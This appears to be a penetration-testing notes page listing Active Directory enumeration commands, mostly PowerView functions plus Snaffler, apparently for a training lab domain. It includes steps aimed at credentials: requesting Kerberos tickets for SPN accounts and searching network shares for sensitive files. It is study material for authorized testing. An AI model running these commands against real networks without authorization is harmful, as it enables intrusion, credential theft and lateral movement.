LinkedInGithub
Edit

Enumeration by Living Off the Land

1. Identify Active Directory Components

Gather Basic Domain Information

  • Command:

Get-Module

  • Description: Lists all available PowerShell modules, including Active Directory-related modules.

  • Command:

Import-Module ActiveDirectory

  • Description: Loads the Active Directory PowerShell module for querying domain information.

  • Command:

Get-ADDomain

  • Description: Retrieves information about the current Active Directory domain.

2. Enumerate Users and Groups

Identify User Accounts

  • Command:

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

  • Description: Lists all Active Directory user accounts with a Service Principal Name (SPN) set.

  • Command:

Get-DomainUser

  • Description: Retrieves all users or specific user objects in Active Directory.

Enumerate Groups

  • Command:

Get-ADGroup -Filter * | Select Name

  • Description: Lists all groups in the target Active Directory domain.

  • Command:

Get-ADGroup -Identity "Backup Operators"

  • Description: Searches for a specific group named "Backup Operators."

  • Command:

Get-ADGroupMember -Identity "Backup Operators"

  • Description: Retrieves members of the "Backup Operators" group.

  • Command:

Get-DomainGroup

  • Description: Returns all groups or specific group objects in Active Directory.

  • Command:

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

  • Description: Lists all members of the "Domain Admins" group recursively.

3. Identify Trusts and Organizational Units (OUs)

Enumerate Trust Relationships

  • Command:

Get-ADTrust -Filter *

  • Description: Lists all trust relationships for the target domain.

  • Command:

Get-DomainTrust

  • Description: Retrieves domain trust information for the current or a specified domain.

  • Command:

Get-ForestTrust

  • Description: Enumerates forest trusts in Active Directory.

  • Command:

Get-DomainTrustMapping

  • Description: Lists all domain trusts and maps them recursively.

Identify Organizational Units

  • Command:

Get-DomainOU

  • Description: Retrieves all or specific Organizational Units (OUs) in Active Directory.

4. Enumerate Active Directory Objects

Identify Domain Controllers

  • Command:

Get-DomainController

  • Description: Retrieves a list of domain controllers in the target Active Directory domain.

Identify Computers and File Servers

  • Command:

Get-DomainComputer

  • Description: Retrieves all computers or specific computer objects in Active Directory.

  • Command:

Get-DomainFileServer

  • Description: Identifies servers likely functioning as file servers.

  • Command:

Get-DomainDFSShare

  • Description: Lists all Distributed File System (DFS) shares for the current or specified domain.

5. Enumerate Group Policy and Permissions

Identify Group Policy Objects (GPOs)

  • Command:

Get-DomainGPO

  • Description: Lists all Group Policy Objects (GPOs) in Active Directory.

  • Command:

Get-DomainPolicy

  • Description: Retrieves the default domain policy or domain controller policy.

Analyze Active Directory Permissions

  • Command:

Find-InterestingDomainAcl

  • Description: Identifies objects with ACL modifications set to non-built-in entities.

6. Identify Local and Shared Resources

Enumerate Local Groups and Members

  • Command:

Get-NetLocalGroup

  • Description: Retrieves local groups on a remote or local machine.

  • Command:

Get-NetLocalGroupMember

  • Description: Lists members of a specified local group.

Identify Shared Resources

  • Command:

Get-NetShare

  • Description: Retrieves a list of open network shares on a target system.

  • Command:

Get-NetSession

  • Description: Retrieves session information for a local or remote machine.

  • Command:

Find-DomainShare

  • Description: Searches for accessible shares on domain machines.

  • Command:

Find-InterestingDomainShareFile

  • Description: Finds files matching specific criteria on domain shares.

7. Identify Active Users and Logged-In Sessions

Track Logged-In Users

  • Command:

Find-DomainUserLocation

  • Description: Identifies machines where specific users are currently logged in.

Test Administrative Access

  • Command:

Test-AdminAccess

  • Description: Checks if the current user has administrative access to a machine.

  • Command:

Find-LocalAdminAccess

  • Description: Identifies machines in the domain where the current user has local administrator privileges.

8. Extract and Analyze Service Principal Names (SPNs)

Extract SPN Information

  • Command:

Get-DomainSPNTicket

  • Description: Requests a Kerberos ticket for a specified Service Principal Name (SPN).

  • Command:

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

  • Description: Identifies users with SPN set in Active Directory.

9. Export Enumeration Data for Offline Analysis

Convert Data for Further Processing

  • Command:

Export-PowerViewCSV

  • Description: Saves PowerView enumeration results to a CSV file.

  • Command:

ConvertTo-SID

  • Description: Converts a user or group name to its Security Identifier (SID).

Automate Sensitive Data Discovery

  • Command:

./Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data

  • Description: Uses Snaffler to search for sensitive files on accessible network shares.

PreviousCredentialed EnumerationNextEnumerating Security Controls

Last updated